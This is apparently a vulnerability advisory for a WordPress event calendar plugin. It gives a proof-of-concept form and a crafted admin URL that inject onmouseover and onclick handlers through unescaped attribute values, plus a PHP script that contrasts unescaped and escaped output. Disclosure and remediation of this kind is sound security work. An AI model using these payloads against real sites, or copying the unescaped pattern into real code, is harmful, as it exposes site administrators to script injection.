The plugin does not escape some user input before outputting it back in attributes, leading to Reflected Cross-Site Scripting issues.
<html>
  <form action="https://example.com/wp-admin/admin-ajax.php?action=ecwd_event_popup_ajax" method="POST">
    <input type="text" value='" onmouseover=alert(/XSS/) p' name="id">
    <input type="submit" value="Send">
  </form>
</html>

And move the mouse over the 'Untitled' text (Firefox only): https://example.com/wp-admin/edit.php?post_type=ecwd_event&page=ecwd_general_settings&tab=%22+accesskey%3Dx+onclick%3Dalert%281%29+p
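The missing escaping and its fix, as an added PHP example that is not the plugin's code: the markup and function names are hypothetical, and htmlspecialchars() stands in for WordPress's esc_attr() so the script runs without WordPress loaded. It assumes PHP's dom extension is available and lists the attributes a parser attaches to the element for both parameter values shown above.

```php
<?php
// Added illustration: hypothetical markup, not taken from the plugin's source.

// Unescaped pattern: the request value is concatenated into a quoted attribute.
function render_unescaped(string $value): string {
    return '<a class="tab" data-id="' . $value . '">Untitled</a>';
}

// Escaped pattern: encode for the attribute context at output time.
// In WordPress this is esc_attr(); htmlspecialchars() stands in here so the
// script runs with plain PHP.
function render_escaped(string $value): string {
    $safe = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a class="tab" data-id="' . $safe . '">Untitled</a>';
}

// Parse the markup and return the attribute names found on the first <a>,
// i.e. what a browser would attach to the element.
function attribute_names(string $html): array {
    libxml_use_internal_errors(true);   // malformed input is expected here
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();
    $names = [];
    $el = $doc->getElementsByTagName('a')->item(0);
    if ($el !== null) {
        foreach ($el->attributes as $attr) {
            $names[] = $attr->nodeName;
        }
    }
    return $names;
}

// The two parameter values from the proof of concept above (URL-decoded).
$inputs = [
    'id'  => '" onmouseover=alert(/XSS/) p',
    'tab' => '" accesskey=x onclick=alert(1) p',
];

foreach ($inputs as $param => $value) {
    foreach (['render_unescaped', 'render_escaped'] as $render) {
        $html = $render($value);
        printf("%-3s %-16s %s\n    attributes: %s\n", $param, $render, $html,
            implode(', ', attribute_names($html)));
    }
}
```

With the unescaped renderer the parsed element gains an event-handler attribute from the request value; with the escaped renderer only `class` and `data-id` remain, and the payload stays inside the `data-id` value.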
Krzysztof Zając
Krzysztof Zając
Yes
2021-12-20 (about 1 years ago)
2021-12-20 (about 1 years ago)
2022-04-16 (about 1 years ago)